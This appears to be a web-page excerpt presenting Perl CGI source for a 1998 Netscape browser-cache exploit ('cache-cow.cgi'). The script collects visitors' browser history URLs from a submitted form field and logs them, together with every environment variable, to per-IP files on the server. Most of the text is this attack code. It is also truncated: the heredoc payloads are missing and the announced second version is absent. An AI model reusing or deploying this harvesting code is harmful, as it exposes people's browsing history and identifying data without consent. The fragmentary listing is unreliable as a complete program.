Below is source code for the two versions of the Netscape Cache
exploit that was recently discovered by Dan Brumleve
, as found on his web site at
First version , and then second version
# cache-cow.cgi -- Dan Brumleve , 1998.08.23
my $self = "";
if ($ENV{PATH_INFO}) {
(my$o=<<" EOF")=~s/\n| //g;print"Content-type: text/html\n\n".$o;
} elsif ($ENV{CONTENT_LENGTH}) {
my $input;read(STDIN,$input,$ENV{CONTENT_LENGTH});sub unescape{my $s
=shift;$s=~tr/+/ /;$s=~s/%([0-9a-fA-F]{2})/pack("c",hex($1))/ge;$s;}
sub extract{my($n,$v)=map{unescape($_)}split(/=/,shift);}my$history=
join("\n",sort map{my($n,$v)=extract($_);$v=~s/^about://;$v||();}#=)
split(/&/,{map{extract($_)}split(/&/,$input)}->{cache}))."\n"; open(
FP,">> logs/log-$ENV{REMOTE_ADDR}.txt");for(sort keys %ENV){print FP
$_."=".$ENV{$_}."\n"}print FP "\n".$history."\n";close(FP);print"C".
"ontent-type: text/plain\n\nHere are the URLs retrieved from your ".
} else {
(my$url=<<" EOF")=~s/ |\n//g;print"Location: $url\n\n";